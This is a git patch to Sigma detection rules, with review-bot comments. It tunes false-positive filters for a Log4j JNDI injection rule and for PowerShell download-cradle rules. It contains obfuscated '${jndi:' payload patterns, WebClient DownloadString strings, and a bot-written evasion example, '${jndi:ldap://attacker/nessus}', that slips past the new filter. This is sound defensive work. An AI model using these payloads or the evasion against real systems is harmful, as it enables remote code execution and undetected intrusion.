From 35d4c8bc69c9796b0ee52cbb92edd2d1309bd667 Mon Sep 17 00:00:00 2001
From: Florian Roth
Date: Mon, 21 Feb 2022 10:15:27 +0100
Subject: [PATCH] fix: FPs noticed in THOR testing
---
 rules/web/web_cve_2021_44228_log4j.yml | 5 ++++-
 .../powershell_suspicious_invocation_specific.yml | 3 ++-
 .../posh_pm_suspicious_invocation_specific.yml | 6 ++++--
 .../posh_ps_suspicious_invocation_specific.yml | 3 ++-
 4 files changed, 12 insertions(+), 5 deletions(-)
diff --git a/rules/web/web_cve_2021_44228_log4j.yml b/rules/web/web_cve_2021_44228_log4j.yml
index e53a08ec5..4fc937707 100644
--- a/rules/web/web_cve_2021_44228_log4j.yml
+++ b/rules/web/web_cve_2021_44228_log4j.yml
@@ -42,7 +42,10 @@ detection:
 - '${${lower:j}ndi:'
 - '${${upper:j}ndi:'
 - '${${::-j}${::-n}${::-d}${::-i}:'
- condition: keywords
+ filter: - 'w.nessus.org/nessus' - '/nessus}'
+ condition: keywords and not filter
 falsepositives:
 - Vulnerability scanning
 level: high
diff --git a/rules/windows/deprecated/powershell_suspicious_invocation_specific.yml b/rules/windows/deprecated/powershell_suspicious_invocation_specific.yml
index acfadcb11..657b72ca9 100644
--- a/rules/windows/deprecated/powershell_suspicious_invocation_specific.yml
+++ b/rules/windows/deprecated/powershell_suspicious_invocation_specific.yml
@@ -7,7 +7,7 @@ tags:
 - attack.t1059.001
 author: Florian Roth (rule), Jonhnathan Ribeiro
 date: 2017/03/05
-modified: 2022/02/16
+modified: 2022/02/21
 logsource:
 product: windows
 service: powershell
@@ -54,6 +54,7 @@ detection:
 filter_chocolatey:
 - "(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1"
 - "(New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1')"
+ - 'Write-ChocolateyWarning'
 condition: (all of convert_b64 or all of iex_selection or all of enc_selection or all of reg_selection or all of webclient_selection or all of iex_webclient) and not 1 of filter_*
 falsepositives:
 - Penetration tests
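Review bot: The new `filter` list in the log4j rule is a bare substring exclusion, so an attacker can silence this high-severity rule by appending the excluded token to their own payload — `${jndi:ldap://attacker/nessus}` contains `/nessus}`, and `condition: keywords and not filter` then drops the event. If the exclusion has to live in the rule rather than in a SIEM-side allow-list of scanner source addresses, that trade-off should be stated next to it, e.g. `# NOTE: substring exclusion for Nessus callbacks; trivially evaded by appending '/nessus}' to a JNDI URL — prefer excluding scanner source IPs downstream` above `filter:`. Separately, the diffstat (`5 ++++-`) accounts for exactly the four additions and one deletion visible in this hunk, so unlike the three PowerShell rules in this patch the log4j rule's `modified:` date was not bumped.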
diff --git a/rules/windows/powershell/powershell_module/posh_pm_suspicious_invocation_specific.yml b/rules/windows/powershell/powershell_module/posh_pm_suspicious_invocation_specific.yml
index fbaf6fd1a..0712ad64f 100644
--- a/rules/windows/powershell/powershell_module/posh_pm_suspicious_invocation_specific.yml
+++ b/rules/windows/powershell/powershell_module/posh_pm_suspicious_invocation_specific.yml
@@ -10,7 +10,7 @@ tags:
 - attack.t1059.001
 author: Florian Roth (rule), Jonhnathan Ribeiro
 date: 2017/03/05
-modified: 2022/02/11
+modified: 2022/02/21
 logsource:
 product: windows
 category: ps_module
@@ -61,7 +61,9 @@ detection:
 - 'Net.WebClient'
 - '.Download'
 filter_chocolatey:
- ContextInfo|contains: "(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1"
+ ContextInfo|contains: - "(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1"
+ - 'Write-ChocolateyWarning'
 condition: 1 of selection* and not 1 of filter*
 falsepositives:
 - Penetration tests
diff --git a/rules/windows/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml b/rules/windows/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml
index 4aa90b4d9..c97078d90 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml
@@ -10,7 +10,7 @@ tags:
 - attack.t1059.001
 author: Florian Roth (rule), Jonhnathan Ribeiro
 date: 2017/03/05
-modified: 2022/02/16
+modified: 2022/02/21
 logsource:
 product: windows
 category: ps_script
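Review bot: In the `posh_pm` hunk the new `'Write-ChocolateyWarning'` entry is a second item in a list under `ContextInfo|contains`, which Sigma evaluates as OR, so with `condition: 1 of selection* and not 1 of filter*` any event whose context merely mentions that function name is excluded even when it matches a suspicious-invocation selection. If the goal is to exclude the Chocolatey installer specifically, pair the function name with an installer indicator rather than adding it as a stand-alone OR entry, or at least record the accepted blind spot with a comment such as `# a bare 'Write-ChocolateyWarning' string is enough to suppress this rule; accepted to silence install.ps1 noise`. This rule's filter also lists only the `community.chocolatey.org` URL, whereas the deprecated and `posh_ps` variants in the same patch keep a second `https://chocolatey.org/install.ps1` entry; it is worth confirming that divergence is intended. The `selection*` blocks the condition refers to are outside this hunk.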
@@ -64,6 +64,7 @@ detection:
 ScriptBlockText|contains:
 - "(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1"
 - "(New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1')"
+ - 'Write-ChocolateyWarning'
 condition: 1 of select* and not 1 of filter*
 falsepositives:
 - Penetration tests
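Review bot: `falsepositives` at the end of this hunk still lists only `Penetration tests`, while the filter directly above it now carries three entries that exist solely to suppress Chocolatey installer activity; add an entry such as `- Chocolatey installation scripts` so the exclusion is documented where analysts look for it. The new `'Write-ChocolateyWarning'` item is also the weakest of the three: unlike the two `DownloadString(...)` strings it is not tied to a Chocolatey URL, so any script block that mentions that function name is dropped from a rule whose `select*` branches are defined outside this hunk. Whether that is an acceptable trade-off depends on how common the name is outside the installer, which the diff cannot show.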